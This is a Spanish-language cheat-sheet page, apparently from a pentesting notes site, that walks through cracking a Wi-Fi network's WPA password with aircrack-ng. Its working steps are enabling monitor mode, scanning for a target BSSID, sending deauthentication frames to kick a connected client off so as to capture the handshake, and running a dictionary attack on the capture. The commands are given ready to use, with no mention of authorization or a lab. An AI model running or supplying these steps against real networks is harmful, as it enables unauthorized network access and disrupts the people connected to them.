AirCrack NG

Previamente se debió instalar aircrack-ng con sudo apt install aircrack-ng

Buscar la interfaz

Buscar la interfaz de tu red wifi con ifconfig o ip a.

Iniciar tu interfaz en modo monitor

sudo airmon-ng start <interface>

Enumerar redes wifi

sudo airodump-ng <interface>

De este escaneo, para el objetivo debemos guardar la información del BSSID y del CH (canal).

Interceptar la estación

sudo airodump-ng -c <CH> --bssid <BSSID> -w output.txt <interface>

De este otro escaneo vamos a querer la STATION para proceder con el envío del tráfico deauth y así obtener el handshake.

Obtención del `handshake` (apretón de manos)

sudo aireplay-ng -0 9 -a <BSSID> -c <STATION> <interface>

Ahora que ya expulsamos al usuario y lo forzamos a reintentar la contraseña, obtenemos el handshake.

Se recomienda repetir este paso unas 3-4 veces en caso de no obtener el handshake.

Obtención de contraseña (ataque por diccionario)

Previo a todo ello ya procederemos a obtener la contraseña pero en forma encriptada, para que con aircrack-ng mediante fuerza bruta de diccionario podamos descifrarla:

sudo aircrack-ng -b <HANDSHAKE> -w <dictionary.txt> <file.cap>

Al querer obtener el handshake se debieron generar archivos de diferentes índoles como: *.cap, *.csv, *.netxml. En caso de no ser así, volver a intentar todos los comandos previos en orden.

PreviousUniq & Sort NextHydra

hashtagBuscar la interfaz

hashtagIniciar tu interfaz en modo monitor

hashtagEnumerar redes wifi

hashtagInterceptar la estación

hashtagObtención del handshake (apretón de manos)

hashtagObtención de contraseña (ataque por diccionario)

Buscar la interfaz

Iniciar tu interfaz en modo monitor

Enumerar redes wifi

Interceptar la estación

Obtención del `handshake` (apretón de manos)

Obtención de contraseña (ataque por diccionario)